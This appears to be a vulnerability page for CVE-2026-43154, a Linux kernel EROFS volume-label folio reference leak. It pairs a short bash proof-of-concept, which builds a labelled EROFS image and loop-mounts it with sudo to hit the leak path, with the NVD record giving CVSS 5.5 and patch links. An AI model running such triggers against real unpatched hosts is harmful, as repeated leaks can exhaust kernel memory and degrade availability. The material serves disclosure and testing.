CVE-2026-43154

#!/bin/bash # PoC for CVE-2026-43154: EROFS Volume Label Folio Leak # This script demonstrates the trigger condition: mounting a crafted EROFS image. # Note: Reproducing the specific leak requires a kernel built before the patch # and potentially specific image parameters, but the vector is the mount operation. IMAGE_FILE="crafted_erofs.img" MOUNT_DIR="/tmp/erofs_poc" SOURCE_DIR="source_erofs" # 1. Prepare a directory structure mkdir -p $SOURCE_DIR echo "Sensitive Data" > $SOURCE_DIR/file.txt # 2. Create an EROFS image with a volume label # The vulnerability is triggered during the handling of this label. # Using 'mkfs.erofs' to create a valid image structure. echo "[*] Creating EROFS image with volume label..." if command -v mkfs.erofs &> /dev/null; then mkfs.erofs -L "VulnLabel_CVE-2026-43154" $IMAGE_FILE $SOURCE_DIR else echo "[!] mkfs.erofs not found. Please install erofs-utils." exit 1 fi # 3. Prepare mount point mkdir -p $MOUNT_DIR # 4. Trigger the vulnerability # The leak occurs when the kernel processes the superblock and volume label echo "[*] Attempting to mount image to trigger early exit path..." sudo mount -t erofs -o loop $IMAGE_FILE $MOUNT_DIR 2>/dev/null if [ $? -eq 0 ]; then echo "[+] Image mounted successfully. Memory leak may have occurred." # In a real test environment, use 'slabtop' or kernel debug tools to monitor folio leaks. sleep 1 sudo umount $MOUNT_DIR else echo "[-] Mount failed. Check kernel logs (dmesg)." fi # Cleanup rm -rf $SOURCE_DIR $IMAGE_FILE $MOUNT_DIR echo "[*] Cleanup complete."

{"cve": {"id": "CVE-2026-43154", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:33.193", "lastModified": "2026-05-13T20:06:24.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: fix incorrect early exits in volume label handling\n\nCrafted EROFS images containing valid volume labels can trigger\nincorrect early returns, leading to folio reference leaks.\n\nHowever, this does not cause system crashes or other severe issues."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.18", "versionEndExcluding": "6.18.16", "matchCriteriaId": "E0D300DB-AA68-4962-981D-EF9F5E97AACF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/3afa4da38802a4cba1c23848a32284e7e57b831b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8d8a878ef60801d867119b3df6a93e2982d62a71", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d498bd168494ad4a4bce16192bfb9ce04ca19c9a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}